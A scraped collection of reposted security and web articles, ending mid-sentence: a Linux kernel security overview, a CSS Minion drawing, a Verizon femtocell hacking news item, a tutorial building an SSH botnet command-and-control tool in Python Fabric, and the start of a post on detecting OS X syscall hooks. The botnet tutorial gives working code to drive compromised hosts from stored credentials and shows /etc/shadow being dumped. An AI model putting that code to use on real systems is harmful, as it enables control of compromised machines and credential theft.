approach to integrity management is the dm-verity module. This is a device mapper target which manages file integrity at the block level. It's intended to be used as part of a verified boot process, where an appropriately authorized caller brings a device online, say, a trusted partition containing kernel modules to be loaded later. The integrity of those modules will be transparently verified block by block as they are read from disk. Hardening and Platform Security Hardening techniques have been applied at various levels, including in the build chain and in software, to help reduce the risk of system compromise. Address Space Layout Randomization (ASLR) places various memory areas of a userland executable in random locations, which helps prevent certain classes of attacks. This was adapted from the external PaX/grsecurity projects, along with several other software-based hardening features. The Linux kernel also supports hardware security features where available, such as NX, VT-d, the TPM, TXT, and SMAP, along with cryptographic processing as previously mentioned. Summary We've covered, at a very high-level, how Linux kernel security has evolved from its Unix roots, adapting to ever-changing security requirements. These requirements have been driven both by external changes, such as the continued growth of the Internet and the increasing value of information stored online, as well as the increasing scope of the Linux user base. Ensuring that the security features of the Linux kernel continue to meet such a wide variety of requirements in a changing landscape is an ongoing and challenging process. James Morris is the Linux kernel security subsystem maintainer. He is the author of sVirt (virtualization security), multi-category security, the kernel cryptographic API, and has contributed to the SELinux, Netfilter and IPsec projects. He works for Oracle as manager of the mainline Linux kernel development team, from his base in Sydney, Australia. Follow James on https://blogs.oracle.com/linuxkernel/. Sursa: https://www.linux.com/learn/docs/727873-overview-of-linux-kernel-security-features
-
[h=1]Pure CSS Minion (Superman Mode)[/h] <!-- Pure CSS Minion, just a little bit of js to toggle the Superman class. @author Ezequiel Calvo <ezecafre@gmail.com> Follow me @EzequielCalvo Hashtag #CSSDrawing #Minion Nice to have: - Wave on the coat. - Animation when changing the clothes. --> <section class="content" id="target"> <ul class="hair hair-left"> <li></li> <li></li> <li></li> <li></li> </ul> <ul class="hair hair-right"> <li></li> <li></li> <li></li> <li></li> </ul> <div class="body"> <div class="glasses"> <span class="band band-left"></span> <span class="band band-right"></span> <div class="glass"> <div class="iris iris-left"> <div class="shine"></div> </div> </div> <div class="glass"> <div class="iris iris-right"> <div class="shine"></div> </div> </div> </div> </div> <div class="mouth"> <ul class="teeth"> <li></li> <li></li> <li></li> <li></li> </ul> </div> <div class="pants"> <div class="belt belt-left"></div> <div class="belt belt-right"></div> </div> <div class="super-pants"> <div class="symbol"> <div class="s-first-part"></div> <div class="s-second-part"></div> </div> </div> <div class="arm arm-left"> <div class="hand"> <ul class="fingers fingers-left"> <li class="finger"></li> <li class="finger"></li> <li class="finger"></li> </ul> </div> </div> <div class="arm arm-right"> <div class="hand"> <ul class="fingers fingers-right"> <li class="finger"></li> <li class="finger"></li> </ul> </div> </div> <div class="legs"> <div class="leg"></div> <div class="leg"></div> </div> <div class="shoes shoes-left"></div> <div class="shoes shoes-right"></div> <div class="coat"></div> </section> <button class="btn">Superman Mode ON!</button> <script class="cssdeck" src="//cdnjs.cloudflare.com/ajax/libs/jquery/1.8.0/jquery.min.js"></script> /** * Minion Pure CSS * * @author Ezequiel Calvo <ezecafre@gmail.com> * Follow me @EzequielCalvo * Hashtag #CSSDrawing #Minion */ .btn { position: absolute; top: 10px; left: 10px; border: 0; padding: 5px 10px; border: 1px solid #c0392b; border-radius: 2px; font-size: 0.95em; background: #e74c3c; color: #EEE; font-weight: 60; } .btn:hover { background: #c0392b; border: 1px solid #e74c3c; } .content { margin: 40px; } .body { width: 180px; height: 325px; margin: 0 auto; position:relative; z-index: 1; border-radius: 85px 85px 0 0; box-shadow: inset 0 -10px 10px 3px #cc9e24; background: #fcda6d; background: -webkit-gradient(linear, right top, left top,color-stop(61%, #fcda6d), color-stop(100%, #cc9e24)); background: -webkit-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -moz-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -ms-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: -o-linear-gradient(right, #fcda6d 67%,#cc9e24 100%); background: linear-gradient(to right, #fcda6d 67%,#cc9e24 100%); } .hair { padding: 0; } .hair li { position: absolute; top: -1px; left: 50%; z-index: 2; list-style: none; height: 45px; width: 5px; border: 2px solid #555; border-radius: 140%; margin: 10px; } .hair-left li { border-left: none; border-bottom: none; } .hair-right li { border-right: none; border-bottom: none; } .hair-left li:nth-child(1) { margin: 20px 0 0 -60px; transform: rotate(-20deg); } .hair-left li:nth-child(2) { height: 30px; margin: 45px 0 0 -75px; transform: rotate(-50deg); } .hair-left li:nth-child(3) { height: 36px; margin: 15px 0 0 -35px; transform: rotate(-10deg); } .hair-left li:nth-child(4) { height: 26px; margin: 35px 0 0 -13px; transform: rotate(-20deg); } .hair-right li:nth-child(1) { margin: 23px 0 0 60px; transform: rotate(20deg); } .hair-right li:nth-child(2) { height: 30px; margin: 45px 0 0 75px; transform: rotate(50deg); } .hair-right li:nth-child(3) { height: 36px; margin: 15px 0 0 35px; transform: rotate(10deg); } .hair-right li:nth-child(4) { height: 34px; margin: 20px 0 0 13px; transform: rotate(20deg); } .band, .band-right:before, .band-left:before { height: 10px; width: 17px; position: relative; display: block; border-radius: 3px; background: #222; box-shadow: 0 1px 5px 0px #222; } .band-right { top: 89px; left: 168px; transform: rotate(5deg); } .band-left { top: 96px; left: -5px; transform: rotate(-5deg); } .band-left:before { content: ""; display: block; top: 10px; background: #333; } .band-right:before { content: ""; display: block; top: 10px; background: #333; } .glasses { width: 180px; } .glass { width: 85px; height: 85px; float: left; margin: 40px 0 0 10px; border-radius: 110px; background: linear-gradient(#989697, #696371); box-shadow: 4px 6px 9px 3px #c48e00; box-shadow: inset 0 -2px 2px #5d4b3d , inset -1px 1px 3px 1px #fff , 1px 5px 7px -1px #c48e00; } .glass:before { content: ""; display: block; width: 65px; height: 65px; border-radius: 70px; position:relative; top: 10px; left: 10px; background: #fcda6d; box-shadow: inset 0 2px 4px 1px #5d4b3d ; } .glass:after { width: 63px; height:50px; content: ""; display: block; border-radius: 70px; position: relative; top: -73px; left: 11px; background: #FFF; /* Old browsers */ background: -webkit-gradient(linear,left bottom,right top,color-stop(0.54, #FFF), color-stop(0.91, #AAA)); background: -webkit-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -moz-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -ms-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: -o-linear-gradient(left bottom,right top, #FFF 54%,#AAA 91%); background: linear-gradient(to left bottom, #FFF 53%,#AAA 91%); -webkit-animation: eyes 4s infinite step-start 0s; -moz-animation: eyes 4s infinite step-start 0s; -ms-animation: eyes 4s infinite step-start 0s; -o-animation: eyes 4s infinite step-start 0s; animation: eyes 4s infinite step-start 0s; } .glass:last-child { margin-left: -9px; } .iris { width: 23px; height: 23px; position: relative; top: -30px; z-index: 10; border: 1px solid #222; border-radius: 50%; background: #000; box-shadow: inset -2px -2px 5px 2px #222, inset 2px 2px 1px 2px #7e4d49; background: -webkit-radial-gradient(center, ellipse cover, #000 25%, #6f4a2d 34%, #c79067 44%, #6f4a2d 50%); background: -moz-radial-gradient(center, ellipse cover, #000 25%, #6f4a2d 34%, #c79067 44%, #6f4a2d 50%); -webkit-animation: iris 4s infinite step-start 0s; -moz-animation: iris 4s infinite step-start 0s; -ms-animation: iris 4s infinite step-start 0s; -o-animation: iris 4s infinite step-start 0s; animation: iris 4s infinite step-start 0s; } .iris-left { left: 38px; } .iris-right { left: 23px; } .iris:before { width: 5px; height: 5px; content: ""; display: block; position: relative; z-index: 11; top: 4px; left: 4px; border-radius: 50%; box-shadow: 0 0 5px 2px #FFF; background: #FFF; } .mouth { width: 70px; height: 30px; margin: 0 auto; position: relative; z-index: 2; top: -155px; border-bottom-left-radius: 50px; border-bottom-right-radius: 50px; border: 0; overflow: hidden; background: #222; background: -webkit-gradient(linear, 0 0, 0 100%, from(#222), color-stop(0.79, #bd736a)); background: -webkit-linear-gradient(#222, #bd736a 99%); background: -moz-linear-gradient(#222, #bd736a 99%); background: -o-linear-gradient(#222, #bd736a 99%); background: linear-gradient(#222, #bd736a 99%); } .mouth:after { content: ""; display:block; position: relative; top: -50px; left: -21px; width: 120px; height: 40px; border-radius: 50%; background: #FCDA6D; box-shadow: inset 0 0 3px 1px #957b43; /*-webkit-animation: mouth 7s infinite step-start 1s; -moz-animation: mouth 7s infinite step-start 1s; -ms-animation: mouth 7s infinite step-start 1s; -o-animation: mouth 7s infinite step-start 1s; animation: mouth 7s infinite step-start 1s;*/ } .teeth { width: 90px; position: relative; top: -19px; padding: 0 5px; } .teeth li { width: 16px; height: 15px; list-style: none; display: block; float: left; z-index: 1; border-radius: 6px; background: #ccccc2; box-shadow: inset 0 -1px 1px 1px #FFF, inset -1px 0 1px 0px #F45; } .teeth li:first-child { height: 12px; } .teeth li:last-child { height: 12px; } .pants { width: 180px; height: 50px; margin: 0 auto; position: relative; z-index: 2; top: -58px; border-radius: 2px 2px 25px 25px; background: #146696; background: -webkit-linear-gradient(left, #146696 67%,#115278 100%); border: 2px dotted #1f4362; box-shadow: inset 1px -10px 10px 2px #1a364d, 0 0 2px 2px #2e5f88; } .pants:before { width: 120px; height: 60px; content: ""; display: block; position: relative; top: -50px; left: 40px; border: 2px dotted #1f4362; border-bottom: 0; border-radius: 10px; background: #146696; background-image: -webkit-gradient(linear, left, color-stop(67%, #146696), color-stop(100%, #115278)); background-image: -webkit-linear-gradient(left, #146696 67%, #115278 100%); background-image: -moz-linear-gradient(left, #146696 67%, #115278 100%); background-image: -ms-linear-gradient(left, #146696 67%, #115278 100%); background-image: -o-linear-gradient(left, #146696 67%, #115278 100%); background-image: linear-gradient(left, #146696 67%, #115278 100%); box-shadow: 0 -3px 2px 2px #2e5f88; } .belt { width: 15px; height: 75px; background: #146696; box-shadow: inset 1px 10px 10px 2px #1a364d; position: relative; } .belt:after { content: ""; display: block; width: 10px; height: 10px; border-radius: 50%; background: #223333; position: absolute; bottom: 5px; left: 2px; } .belt-left { top: -160px; left: 18px; border: 2px dotted #1f4362; border-top-left-radius: 25px; -webkit-transform: rotate(-55deg); -moz-transform: rotate(-55deg); -ms-transform: rotate(-55deg); -o-transform: rotate(-55deg); transform: rotate(-55deg); } .belt-right { height: 60px; top: -230px; left: 158px; border: 2px dotted #1F4362; border-top-right-radius: 25px; -webkit-transform: rotate(35deg); -moz-transform: rotate(35deg); -ms-transform: rotate(35deg); -o-transform: rotate(35deg); transform: rotate(35deg); } .arm { width: 20px; height: 100px; margin: 0 auto; position: relative; z-index: 2; border-radius: 10px; background: #FFD449; } .arm-right { z-index: 1; height: 115px; top: -410px; left: 95px; box-shadow: inset 0 10px 10px 3px #D5970E; -webkit-transform: rotate(-10deg); -moz-transform: rotate(-10deg); -ms-transform: rotate(-10deg); -o-transform: rotate(-10deg); transform: rotate(-10deg); } .arm-left { top: -290px; left: -104px; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .arm-left:before { content: ""; display: block; width: 21px; height: 40px; position: relative; top: -18px; border-radius: 50%; background: #FFD449; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .arm-left:after, .arm-right:after { content: ""; display: block; width: 22px; height: 20px; position: relative; border-radius: 6px; background: #FFD449; } .arm-left:after { z-index: 3; top: -14px; -webkit-transform: rotate(-15deg); -moz-transform: rotate(-15deg); -ms-transform: rotate(-15deg); -o-transform: rotate(-15deg); transform: rotate(-15deg); } .arm-right:after { z-index: 3; top: 55px; left: -2px; box-shadow: inset -3px -6px 5px 1px #D5970E; -webkit-transform: rotate(15deg); -moz-transform: rotate(15deg); -ms-transform: rotate(15deg); -o-transform: rotate(15deg); transform: rotate(15deg); } .hand { height: 40px; width: 35px; position: relative; z-index: 1; top: 35px; left: 0; border-radius: 30%; box-shadow: inset 0 -2px 10px 5px #222; background: #333; -webkit-transform: rotate(-20deg); -moz-transform: rotate(-20deg); -ms-transform: rotate(-20deg); -o-transform: rotate(-20deg); transform: rotate(-20deg); } .hand:before { content: ""; display: block; position: relative; z-index: 1; top: -5px; left:-3px; width: 30px; height: 9px; background: #111; border: 5px solid #222; border-radius: 50%; box-shadow: 0 4px 1px 0 #444; } .hand:after { content: ""; display: block; position: relative; z-index: 1; top: -100px; left: 1px; width: 34px; height: 30px; background: #333; border-radius: 50%; box-shadow: inset 0 -10px 10px 5px #222; -webkit-transform: rotate(5deg); -moz-transform: rotate(5deg); -ms-transform: rotate(5deg); -o-transform: rotate(5deg); transform: rotate(5deg); } .fingers { list-style: none; position: relative; top: 10px; } .fingers li { border-radius: 10px; position: relative; background: #333; box-shadow: inset 0 -10px 10px 5px #222; } .fingers-right li:nth-child(1) { z-index: 2; width: 20px; height: 35px; top: -20px; left: -50px; border-right: 2px solid #000; -webkit-transform: rotate(50deg); -moz-transform: rotate(50deg); -ms-transform: rotate(50deg); -o-transform: rotate(50deg); transform: rotate(50deg); } .fingers-right li:nth-child(2) { z-index: 1; width: 20px; height: 30px; top: -50px; left: -40px; border-right: 2px solid #000; -webkit-transform: rotate(40deg); -moz-transform: rotate(40deg); -ms-transform: rotate(40deg); -o-transform: rotate(40deg); transform: rotate(40deg); } .fingers-left li:nth-child(1) { z-index: 2; width: 25px; height: 25px; top: -17px; left: -43px; border-right: 2px solid #000; border-radius: 30px; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .fingers-left li:nth-child(2) { z-index: 1; width: 20px; height: 24px; top: -50px; left: -18px; border-right: 2px solid #000; -webkit-transform: rotate(-30deg); -moz-transform: rotate(-30deg); -ms-transform: rotate(-30deg); -o-transform: rotate(-30deg); transform: rotate(-30deg); } .fingers-left li:nth-child(3) { z-index: 1; width: 23px; height: 30px; top: -63px; left: -33px; border-right: 2px solid #000; -webkit-transform: rotate(0deg); -moz-transform: rotate(0deg); -ms-transform: rotate(0deg); -o-transform: rotate(0deg); transform: rotate(0deg); } .arm-right .hand { top: 105px; left: -15px; transform: rotate(20deg); -webkit-transform: rotate(20deg); -moz-transform: rotate(20deg); -ms-transform: rotate(20deg); -o-transform: rotate(20deg); transform: rotate(20deg); } .arm-left .hand:after { height: 30px; width: 30px; left: 3px; top: -110px; } .legs { width: 120px; margin: 0 auto; } .leg { z-index: 1; width: 40px; height: 35px; display: inline-block; background: #146696; border-radius: 30%; position: relative; box-shadow: inset 1px 10px 10px 2px #222; top: -410px; left: 20px; } .shoes { z-index: 1; background: #222; margin: 0 auto; position: relative; box-shadow: inset -2px 1px 10px 1px #666; } .shoes-left { z-index: 0; width: 40px; height: 30px; top: -425px; left: -20px; border-radius: 20px; box-shadow: inset 0 -3px 3px 1px #999; } .shoes-right { z-index: 0; width: 50px; height: 20px; top: -452px; left: 30px; border-radius: 20px; border-right: 1px solid #000; box-shadow: inset -1px 1px 5px 1px #999; -webkit-transform: rotate(10deg); -moz-transform: rotate(10deg); -ms-transform: rotate(10deg); -o-transform: rotate(10deg); transform: rotate(10deg); } .shoes-right:after { content: ""; display: block; position: relative; width: 50px; height: 20px; top: -3px; border-bottom: 7px solid #111; border-radius: 20px; } .shoes-left:after { content: ""; display: block; position: relative; width: 40px; height: 20px; top: 5px; border-bottom: 7px solid #222; border-radius: 20px; } /* Superman Styles*/ .coat { width: 200px; height: 150px; margin: 0 auto; background: red; z-index: 0; position: relative; visibility: hidden; top: -625px; border-radius: 10px; box-shadow: inset 1px 2px 20px 4px #B32020, inset 0 -3px 20px 4px #222; left: -2px; } .superman .leg { background: #222; } .superman .coat { visibility: visible; } .superman .mouth { background: #fcda6d; } .superman .mouth:after { border-radius: 0; } .superman .arm, .superman .arm-left:after, .superman .arm-left:before, .superman .arm-right:after { background: blue; background: -webkit-linear-gradient(left, #222 67%,#115278 100%); box-shadow: inset 0 10px 10px 3px #000; } .super-pants { width: 180px; height: 130px; margin: 0 auto; position: relative; z-index: 2; top: -188px; overflow: hidden; border-radius: 2px 2px 25px 25px; background: blue; visibility: hidden; background: -webkit-linear-gradient(right, #222 67%,#115278 100%); background: -moz-linear-gradient(right, #222 67%,#115278 100%); box-shadow: inset -1px -10px 10px 2px #1a364d, 0 0 2px 2px #2e5f88; } .symbol { width: 100px; height: 100px; position: relative; top: -30px; left: 52px; z-index: 1; overflow: hidden; background: red; box-shadow: 1px 1px 5px 4px red, inset 0 0 6px 3px #222, inset 1px -10px 12px 1px #444, inset 4px 0 4px 1px #FFF; -webkit-transform: rotate(45deg); -moz-transform: rotate(45deg); -ms-transform: rotate(45deg); -o-transform: rotate(45deg); transform: rotate(45deg); } .s-first-part { width: 100px; height: 20px; z-index: 2; background: yellow; position: relative; border: 1px solid #000; border-radius: 20px 0 0 100px; top: 26px; left: 14px; box-shadow: inset -1px 0 10px 4px #111, 1px 1px 14px 1px #000; -webkit-transform: rotate(-45deg); -moz-transform: rotate(-45deg); -ms-transform: rotate(-45deg); -o-transform: rotate(-45deg); transform: rotate(-45deg); } .s-second-part { width: 60px; height: 20px; z-index: 2; background: yellow; position: relative; border: 1px solid #000; border-radius: 5px 20px 100px 10px; top: 55px; left: 35px; box-shadow: inset 3px 0 10px 4px #111, 1px 1px 14px 1px #000; -webkit-transform: rotate(-45deg); -moz-transform: ; -ms-transform: ; -o-transform: ; transform: ; } .superman .pants { visibility: hidden; } .superman .super-pants { visibility: visible; } /* Eyes Animation */ @-webkit-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @-moz-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @-o-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @-ms-keyframes eyes { 0%, 100% { background:#fcda6d; border: none; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } @keyframes eyes { 0%, 100% { background:#fcda6d; border: none; border-bottom: 1ox solid #222; box-shadow: 0 0 0 #fff; } 15%, 95% { background:#fff; box-shadow: inset 0 0 3px 1px #CCC; } } /* Iris Animation */ @-webkit-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-moz-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-o-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @-ms-keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } @keyframes iris { 0%, 100% { opacity: 0; } 15%, 95% { opacity: 1; } } /* Mouth Animation */ @-webkit-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-moz-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-o-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @-ms-keyframes mouth { 0%, 100% { top: -20px; } 15%, 95% { top: -7px; } } @keyframes mouth { 0%, 100% { top: 0px; } 15%, 95% { top: -35px; } } /** * Js event handler to change between Clark and Superman modes. * * @author Ezequiel Calvo <ezecafre@gmail.com> * Follow me @EzequielCalvo * Hashtag #CSSDrawing #Minion */ $('.btn').on('click', function() { $('#target').toggleClass('superman'); }); Sursa: Pure CSS Minion (Superman Mode) | CSSDeck
-
[h=1]Coedbraking…[/h] According to the Daily Mail the UK’s NSA-equivalent (approximately), GCHQ, has said that many of its codebreakers are dyslexic. You (or those of us living in this sceptred isle (This blessed plot, this earth, this realm, this England…) may or may not find this reassuring. It probably explains why crypto is one of my weaker areas, technically. This may well be the only time I ever link to the Daily Mail in a blog… David Harley CITP FBCS CISSP Small Blue-Green World ESET Senior Research Fellow Sursa: Coedbraking… | Dataholics: the IT addiction
-
[h=3]Hackers turn Verizon signal booster into a mobile hacking machine[/h] A group of hackers from security firm iSEC found a way to tap right into verizon wireless cell phones using a signal-boosting devices made by Samsung for Verizon and cost about $250. They hack Verizon's signal-boosting devices, known as femtocells or network extenders, which anyone can buy online, and turned it into a cell phone tower small enough to fit inside a backpack capable of capturing and intercepting all calls, text messages and data sent by mobile devices within range. "This is not about how the NSA would attack ordinary people. This is about how ordinary people would attack ordinary people," said Tom Ritter, a senior consultant, iSEC. They declined to disclose how they had modified the software on the device and but they plan to give more elaborate demonstrations in various hacking conferences this year. http://www.youtube.com/watch?feature=player_embedded&v=9nEOsjjhZPg Verizon Wireless already released a Linux software update in March to fix the flaw that prevents its network extenders from being compromised in the manner reported by Ritter and DePerry. They claimed that, with a little more work, they could have weaponized it for stealth attacks by packaging all equipment needed for a surveillance operation into a backpack that could be dropped near a target they wanted to monitor. This particular femtocell taps into Verizon phones. However, they believes it might be possible to find a similar problem with femtocells that work with other providers. Sursa: Hackers turn Verizon signal booster into a mobile hacking machine - The Hacker News
-
[h=3]Building an SSH Botnet C&C Using Python and Fabric[/h] Introduction Disclaimer: I suppose it would be wise to put a disclaimer on this post. Compromising hosts to create a botnet without authorization is illegal, and not encouraged in any way. This post simply aims to show security professionals how attackers could use standard IT automation tools for a purpose in which they were not originally intended. Therefore, the content is meant for educational purposes only. System administrators often need to perform the same (or similar) tasks across a multitude of hosts. Doing this manually is unreasonable, so solutions have been created to help automate the process. While these solutions can be a life-saver to many, let's look at them in a different light. In this post, we'll explore how easy it would be for an attacker to use one of these solutions, a popular Python library called Fabric, to quickly create a command and control (C&C) application that can manage a multitude of infected hosts over SSH. Fabric Basics Fabric's documentation describes it as a "library and command-line tool for streamlining the use of SSH for application deployment or systems administration tasks." Using the popular Paramiko Python library to manage it's SSH connections, Fabric provides programmers with an easy-to-use API to run sequential or parallel tasks across many machines. Before building a C&C application, let's explore some of the basics of Fabric (a full tutorial can be found here). The "fab" Command-line Tool While we won't be using it much in this post, I don't feel a post about Fabric would be complete without mentioning the "fab" tool. Usually, sysadmins only need to setup predefined commands (called "tasks") to be run on multiple hosts. With this being the case, the standard application of Fabric is as follows: Create a "fabfile" (more on this later) Use the fab tool to execute tasks defined in the fabfile on selected hosts While this allows us to run a predefined set of commands, this isn't helpful if we want an interactive framework. The solution to this is found in the Fabric documentation: The fab tool simply imports your fabfile and executes the function or functions you instruct it to. There’s nothing magic about it – anything you can do in a normal Python script can be done in a fabfile! This means that we can execute any task in our fabfile without needing to go through the fab command line tool. This is helpful, since we can create an interactive management wrapper to perform tasks on a dynamic list of hosts as we choose. But first, we need to address the obvious: what is a fabfile? Fabfiles In a nutshell, a fabfile is simply a file containing functions and commands that incorporate Fabric's API. These functions can be found in the fabric.api namespace. It's important to remember our note above which says that a fabfile is just Python - nothing special. So, with that brief intro, let's dive into the Fabric API to see how we can use the provided functions to build an SSH C&C: Building the C&C Let's assume an attacker managed to compromise numerous hosts, either using SSH, or via other means and now has SSH access to them. Let's also assume that credentials to these hosts are stored in a file with the following format: username@hostname:port password The example for this post will be as follows: root@192.168.56.101:22 toor root@192.168.56.102:22 toor It is important to note that Fabric tries to automatically detect the type of authentication needed (password or passphrase for private key). Therefore, if the passwords stored in the credentials file are for private keys, they should work seamlessly. Now that we have our credentials, let's consider what functions we will create. For the sake of this post, let's implement the following: Status check to see which hosts are running Run a supplied command on multiple selected hosts Create an interactive shell session with a host To start, we will import all members of the fabric.api namespace: [/font]from fabric.api import *Next, we will use two of Fabric's environment variables, env.hosts and env.passwords, to manage our host connections. "Env.hosts" is a list we can use to manage our master host list, and env.passwords is a mapping between host strings and passwords to be used. This prevents us from having to enter the passwords upon each new connection. Let's read all the hosts and passwords from the credentials file and put them into the variables: [/font]for line in open('creds.txt','r').readlines():host, passw = line.split() env.hosts.append(host) env.passwords[host] = passw Now for the fun part - running commands. There are 6 types of command-execution functions that can we should consider: run(command) - Run a shell command on a remote host.sudo(comand) - Run a shell command on a remote host, with superuser privileges.local(command) - Run a command on the local system.open_shell() - Opens an interactive shell on the remote systemget(remote_path, local_path) - Download one or more files from a remote host.put(local_path, remote_path) - Upload one or more files to a remote host. Let's see how we can use these commands. First, let's create a function that takes in a command string, and execute the command using Fabric's "run" or "sudo" command as needed: def run_command(command):try: with hide('running', 'stdout', 'stderr'): if command.strip()[0:5] == "sudo": results = sudo(command) else: results = run(command) except: results = 'Error' return results Now, let's create a task that will use our run_command function to see which hosts are up and running. We will do this by executing the command uptime on the hosts. [/font]def check_hosts():''' Checks each host to see if it's running ''' for host, result in execute(run_command, "uptime", hosts=env.hosts).iteritems(): running_hosts[host] = result if result.succeeded else "Host Down" For the other tasks, we will want to dynamically select which hosts we want to run a given command on, or establish a shell session to. We can do this by creating a menu, and then executing these tasks with a specific list of hosts using Fabric's execute function. Here's what this looks like: def get_hosts():selected_hosts = [] for host in raw_input("Hosts (eg: 0 1): ").split(): selected_hosts.append(env.hosts[int(host)]) return selected_hosts def menu(): for num, desc in enumerate(["List Hosts", "Run Command", "Open Shell", "Exit"]): print "[" + str(num) + "] " + desc choice = int(raw_input('\n' + PROMPT)) while (choice != 3): list_hosts() # If we choose to run a command if choice == 1: cmd = raw_input("Command: ") # Execute the "run_command" task with the given command on the selected hosts for host, result in execute(run_command, cmd, hosts=get_hosts()).iteritems(): print "[" + host + "]: " + cmd print ('-' * 80) + '\n' + result + '\n' # If we choose to open a shell elif choice == 2: host = int(raw_input("Host: ")) execute(open_shell, host=env.hosts[host]) for num, desc in enumerate(["List Hosts", "Run Command", "Open Shell", "Exit"]): print "[" + str(num) + "] " + desc choice = int(raw_input('\n' + PROMPT)) if __name__ == "__main__": fill_hosts() check_hosts() menu() I should note that I left out a task to put a file onto the remote host, since this can be easily done from the command line (though a task for this could be made easily). Let's see what our application looks like in action: C:\>python fabfile.py [root@192.168.56.101:22] Executing task 'run_command' [root@192.168.56.102:22] Executing task 'run_command' [0] List Hosts [1] Run Command [2] Open Shell [3] Exit fabric $ 1 ID | Host | Status ---------------------------------------- 0 | root@192.168.56.101:22 | 07:27:14 up 10:40, 2 users, load average: 0.05, 0.03, 0.05 1 | root@192.168.56.102:22 | 07:27:12 up 10:39, 3 users, load average: 0.00, 0.01, 0.05 Command: sudo cat /etc/shadow Hosts (eg: 0 1): 0 1 [root@192.168.56.101:22] Executing task 'run_command' [root@192.168.56.102:22] Executing task 'run_command' [root@192.168.56.101:22]: sudo cat /etc/shadow -------------------------------------------------------------------------------- root:$6$jcs.3tzd$aIZHimcDCgr6rhXaaHKYtogVYgrTak8I/EwpUSKrf8cbSczJ3E7TBqqPJN2Xb.8UgKbKyuaqb78bJ8lTWVEP7/:15639:0:99999:7::: daemon:x:15639:0:99999:7::: bin:x:15639:0:99999:7::: sys:x:15639:0:99999:7::: sync:x:15639:0:99999:7::: games:x:15639:0:99999:7::: man:x:15639:0:99999:7::: lp:x:15639:0:99999:7::: <snip> [root@192.168.56.102:22]: sudo cat /etc/shadow -------------------------------------------------------------------------------- root:$6$27N90zvh$scsS8shKQKRgubPBFAcGcbIFlYlImYGQpGex.sd/g3UvbwQe5A/aW2sGvOsto09SQBzFF5ZjHuEJmV5GFr0Z0.:15779:0:99999:7::: daemon:*:15775:0:99999:7::: bin:*:15775:0:99999:7::: sys:*:15775:0:99999:7::: sync:*:15775:0:99999:7::: games:*:15775:0:99999:7::: man:*:15775:0:99999:7::: <snip> [0] List Hosts [1] Run Command [2] Open Shell [3] Exit fabric $ 2 ID | Host | Status ---------------------------------------- 0 | root@192.168.56.101:22 | 07:27:14 up 10:40, 2 users, load average: 0.05, 0.03, 0.05 1 | root@192.168.56.102:22 | 07:27:12 up 10:39, 3 users, load average: 0.00, 0.01, 0.05 Host: 1 [root@192.168.56.102:22] Executing task 'open_shell' Last login: Wed Jul 3 07:27:44 2013 from 192.168.56.1 root@kali:~# whoami root root@kali:~# exit logout [0] List Hosts [1] Run Command [2] Open Shell [3] Exit fabric $ 3 Great! It looks like we were able to successfully control all of the machines we had access to. It's important to note that there is so much more we can do with Fabric to help facilitate the host management. Here are just a few examples: By adding the @parallel decorator before our tasks, our tasks will run in parallel (Note: this won't work in Windows). Fabric also allows us to create groups (called roles). We could use these roles to create groups based on location, functionality, etc. Since our fabfile is just Python, we can extend it to use any functionality we want. For example, we could easily create a web interface to this using Flask or Django Conclusion The goal of this post was to give a practical example showing how attackers could use high-quality network management products in ways they weren't intended to be used. It's important to note that this same functionality could extend to any other IT automation solution such as Chef, Puppet, or Ansible. As always, feel free to leave questions and comments below. - Jordan Posted by Jordan Sursa: RaiderSec: Building an SSH Botnet C&C Using Python and Fabric
-
Back to Defense: Finding Hooks in OS X with Volatility Summary In my previous post I discussed how to mess with the OS X syscall table through direct syscall table modification, syscall function inlining, and patching the syscall handler. As I promised, I'll be providing a plugin to find the mess! The code for the check_hooks plugin can be found at github and it incorporates existing detections for the sake of completeness. So let's go through the scenarios discussed earlier. Syscall Interception by Directly Modifying the Syscall Table - Replacing a Syscall with Another Syscall Detecting a duplicate syscall entry is straight forward: keep track of the syscalls as they are listed and see if a duplicate appears. The example I'll be using is discussed in my previous post, which was replacing the setuid function with the exit function: [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Duplicate syscall function detection[/TD] [/TR] [/TABLE] - Replacing a Syscall with a DTrace hook This one is an easy catch as well. I just check the syscall name to if contains the word 'dtrace' to detect syscall and mach_trap DTrace hooks. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]DTrace syscall hooking detection[/TD] [/TR] [/TABLE] - Replacing a Syscall with an External Function For this case I'll be using a Rubilyn infected memory sample provided by @osxreverser, which can be found here. This is not a new detection, but it's included for the sake of completeness. As a new feature to this detection, I've included the hooks destination kext in 